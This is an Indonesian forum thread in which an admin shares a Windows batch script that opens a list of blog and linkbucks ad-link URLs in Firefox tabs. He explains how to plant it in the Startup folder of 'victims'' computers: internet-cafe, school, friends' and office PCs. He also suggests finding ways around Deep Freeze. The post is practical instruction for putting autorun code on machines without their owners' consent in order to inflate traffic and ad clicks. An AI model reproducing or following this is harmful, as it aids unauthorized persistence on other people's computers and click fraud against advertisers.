Daily Forum Community

DAILY FORUM
 
Daily ForumIndeksFAQPencarianPendaftaranLogin
BILLING
Login
Username:
Password:
Login otomatis: 
:: Lupa password?
Top posters
Cyber daily
 
=xMINACOOx=
 
tirani dwitasari
 
angga aja
 
cumi
 
• [dz]ÇìéÐèá²
 
kuntheng
 
brouu
 
DF_Ricky
 
kukung
 
Latest topics
» Aplikasi System RFID untuk Perpustakaan
Tue Aug 18, 2015 5:28 pm by rosesana

» [JUAL] Robot Darwin Mini
Wed Jul 16, 2014 1:30 pm by rosesana

» Teknologi RFID dalam inovasi Manajemen untuk Industri tabung Gas
Thu Jun 12, 2014 6:19 am by rosesana

» Long range RFID reader dengan gate antenna.
Tue Jun 03, 2014 6:17 pm by rosesana

» [JUAL] ODROID XU-LITE mini komputer
Fri Mar 07, 2014 4:25 pm by rosesana

» [JUAL] ODROID U3 mini komputer
Tue Mar 04, 2014 12:00 pm by rosesana

» [JUAL] low cost character LCD
Mon Feb 24, 2014 5:36 pm by rosesana

» [JUAL] Intel Galileo
Tue Feb 11, 2014 10:07 pm by rosesana

» [JUAL] TPR3005T - 3 Channel variabel DC power supply
Wed Feb 05, 2014 5:20 pm by rosesana

DF R@DIO™



PARTNERS



Live Traffic

Share | 
 

 [SHARE] Naikin Traffic BLogmu untuk anak member df ala gua

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
=xMINACOOx=
Admin
Admin


178
Points : 2891
Reputation : 221
Join date : 10.03.11
Age : 25
Lokasi : Depan Komputer

PostSubyek: [SHARE] Naikin Traffic BLogmu untuk anak member df ala gua   Sat Mar 12, 2011 12:19 am

oke, mau share sedikit tentang cara naikin traffic yang rada rada nyeleneh..
ya mungkin ga senyeleneh dengan cara bikin pamflet link website or blogmu, lalu ditempel di halte bus, kantin, tukang bakso,. es cendol, cincau dlll.

tapi kalo di perhatikan ya emang nyeleneh nih cara..

caranya bagaimana? ikuti petualangan naikin traffic cara dudut ala gw..
inti dari cara ini adalah membuat batch file yang autostartup di warnet2x korban lo, bisa jg kmputer sekolah, komputer temen, kantor, dll.. terserah. namanya jg cara stress... (yang blognya ga laku trafficnya)..hehe

pertama tama lu buat batch file dulu..
ini contoh scriptnya

@ECHO OFF
REM Opens multiple tabs for firefox
REM For some sites it might be possible to append parameters like
REM [You must be registered and logged in to see this link.]
SET BROWSER=firefox.exe
SET WAIT_TIME=10
START %BROWSER% -new-tab "06d2f4bb.linkbucks.com"
@ping 127.0.0.1 -n %WAIT_TIME% -w 1000 > nul
START %BROWSER% -new-tab "tutorialbasket.blogspot.com"
START %BROWSER% -new-tab "allwintemplate.blogspot.com"
START %BROWSER% -new-tab "thumblerone.blogspot.com"
START %BROWSER% -new-tab "erisukolies.blogspot.com"
START %BROWSER% -new-tab "tutorialisme.com"



ini contoh jadinya ada DISINI

bagaimana membuat batch file dari script diatas?
1. buka notepad, wordpad, dll.. terserah ente.
2. copas script diatas (tentunya link2xnya diganti sendiri, itu diatas adalah link blog gw sendiri yang mao di promosiin, dan hanya contoh saja)
3. save as filenya dalam bentuk ekstension bat... misal...test.bat, iseng.bat, dll.bat.. apalah terserah.
4. DONE

untuk ngetest, silahkan dobel klik file yang baru lu create tadi
jika sukses, maka akan terbuka mozila firefox, dan selang waktu 10 detik (liat diatas wait time = 10 detik), akan terbuka link link lain dalam TAB yang lain.
harap perhatikan, wait time terlalu cepat akan membuat link terbuka dalam browser baru dan bukan di TAB baru.

NAH.. kalo udah selesai bikin batch tinggal buat biar itu batch terekseskusi setiap PC start atau PC log on.
Cara 1 via shortlink autostartup
1. klik kanan file batchmu, pilih.. create shortlink..
2. coy shortlink tersebut, ato cut jg bisa..
3. paste ke START-PROGRAMS-STARTUP
4. DONE

Cara 2 via SOftware
saya sih pakek software regcleaner karena enteng, tinggal add ke startup aja di software itu.

kekurangan:
1. di PC PC dengan deepfreeze mungkin sulit dilakukan, tapi ya itu resiko, silahkan cari cara lain biar itu batch bisa autorun di PC tersebut.
2. ini cm iseng dan pasti banyak kekurangannya... hihihihi.

Credit by me ([You must be registered and logged in to see this link.]
Kembali Ke Atas Go down
http://www.minacoo.com
=xXMETALIZERXx=
Level II
Level II


66
Points : 2454
Reputation : 173
Join date : 10.03.11
Age : 22
Lokasi : Batam

PostSubyek: Re: [SHARE] Naikin Traffic BLogmu untuk anak member df ala gua   Tue Jul 19, 2011 1:36 pm

Very Happy Very Happy Very Happy Very Happy Very Happy Very Happy
Kembali Ke Atas Go down
http://wahyu-hackers.blogspot.com
 
[SHARE] Naikin Traffic BLogmu untuk anak member df ala gua
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Upsidedown, velg, swing arm MOGE untuk Ninja250 dg harga special untuk anak klub
» [WTA] Naikin performa dan top speed N250R
» Pengen pasang KNN filter (open filter) + naikin spuyer
» [wts] Helm Full Face Anak (Kid's Helmet)
» SARAN DONK LAGU PERPISAHAN ANAK KELAS XII (Kelas 3 SMA)???

Permissions in this forum:Anda tidak dapat menjawab topik
Daily Forum Community :: Internet Help and Discussion Center :: Programming-
Navigasi: